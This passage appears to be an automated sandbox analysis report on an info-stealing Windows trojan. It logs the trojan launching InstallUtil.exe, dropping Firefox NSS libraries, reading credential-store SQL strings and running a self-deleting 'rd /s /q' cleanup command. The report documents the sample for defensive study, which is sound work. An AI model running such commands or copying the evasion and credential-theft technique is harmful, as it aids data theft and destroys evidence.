                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C67E2F04_2_6C67E2F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C678AC04_2_6C678AC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6322A04_2_6C6322A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C664AA04_2_6C664AA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C64CAB04_2_6C64CAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6A2AB04_2_6C6A2AB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6ABA904_2_6C6ABA90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C64C3704_2_6C64C370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6353404_2_6C635340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C67D3204_2_6C67D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6A53C84_2_6C6A53C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C63F3804_2_6C63F380
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6EAC604_2_6C6EAC60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7BAC304_2_6C7BAC30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7A6C004_2_6C7A6C00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C73ECD04_2_6C73ECD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6DECC04_2_6C6DECC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7AED704_2_6C7AED70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C86CDC04_2_6C86CDC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C868D204_2_6C868D20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C80AD504_2_6C80AD50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6E4DB04_2_6C6E4DB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C776D904_2_6C776D90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C77EE704_2_6C77EE70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7C0E204_2_6C7C0E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6EAEC04_2_6C6EAEC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C780EC04_2_6C780EC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C766E904_2_6C766E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7A2F704_2_6C7A2F70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C828FB04_2_6C828FB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C74EF404_2_6C74EF40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6E6F104_2_6C6E6F10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7BEFF04_2_6C7BEFF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6E0FE04_2_6C6E0FE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C820F204_2_6C820F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6EEFB04_2_6C6EEFB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7B48404_2_6C7B4840
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7308204_2_6C730820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C76A8204_2_6C76A820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7E68E04_2_6C7E68E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7189604_2_6C718960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7369004_2_6C736900
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7149F04_2_6C7149F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7FC9E04_2_6C7FC9E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7A09B04_2_6C7A09B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7709A04_2_6C7709A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C79A9A04_2_6C79A9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C75CA704_2_6C75CA70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C798A304_2_6C798A30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C78EA004_2_6C78EA00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C75EA804_2_6C75EA80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7E6BE04_2_6C7E6BE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C780BA04_2_6C780BA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C80A4804_2_6C80A480
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6F84604_2_6C6F8460
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C76A4304_2_6C76A430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7444204_2_6C744420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7264D04_2_6C7264D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C77A4D04_2_6C77A4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7805704_2_6C780570
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7425604_2_6C742560
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7385404_2_6C738540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7E45404_2_6C7E4540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C76E5F04_2_6C76E5F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7AA5E04_2_6C7AA5E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C8285504_2_6C828550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6D45B04_2_6C6D45B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C73C6504_2_6C73C650
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 6C66CBE8 appears 134 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 004047E8 appears 38 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 6C703620 appears 35 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 6C6794D0 appears 90 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 6C709B10 appears 31 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 00410609 appears 71 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 004104E7 appears 36 times
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1907294244.0000000012CE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameObjectWMICollection.dllH vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exe, 00000000.00000000.1657488047.0000000000A62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameObjectWMICollection.dllH vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exe, 00000000.00000000.1657488047.0000000000A62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameControlledAccessPoint.exeP vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exeBinary or memory string: OriginalFilenameObjectWMICollection.dllH vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exeBinary or memory string: OriginalFilenameControlledAccessPoint.exeP vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.7AeSqNv1rC.exe.1d010000.4.raw.unpack, WMIHelperClass.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.0.7AeSqNv1rC.exe.a7b8e7.1.raw.unpack, WMIHelperClass.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.7AeSqNv1rC.exe.12ce1a78.3.raw.unpack, WMIHelperClass.csCryptographic APIs: 'CreateDecryptor'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/22@2/4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C697030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,4_2_6C697030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,4_2_004114A5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,4_2_00411807
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7AeSqNv1rC.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                        Source: 7AeSqNv1rC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 7AeSqNv1rC.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: InstallUtil.exe, InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: DBKEHD.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: 7AeSqNv1rC.exeReversingLabs: Detection: 65%
                        Source: 7AeSqNv1rC.exeVirustotal: Detection: 30%
                        Source: unknownProcess created: C:\Users\user\Desktop\7AeSqNv1rC.exe "C:\Users\user\Desktop\7AeSqNv1rC.exe"
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
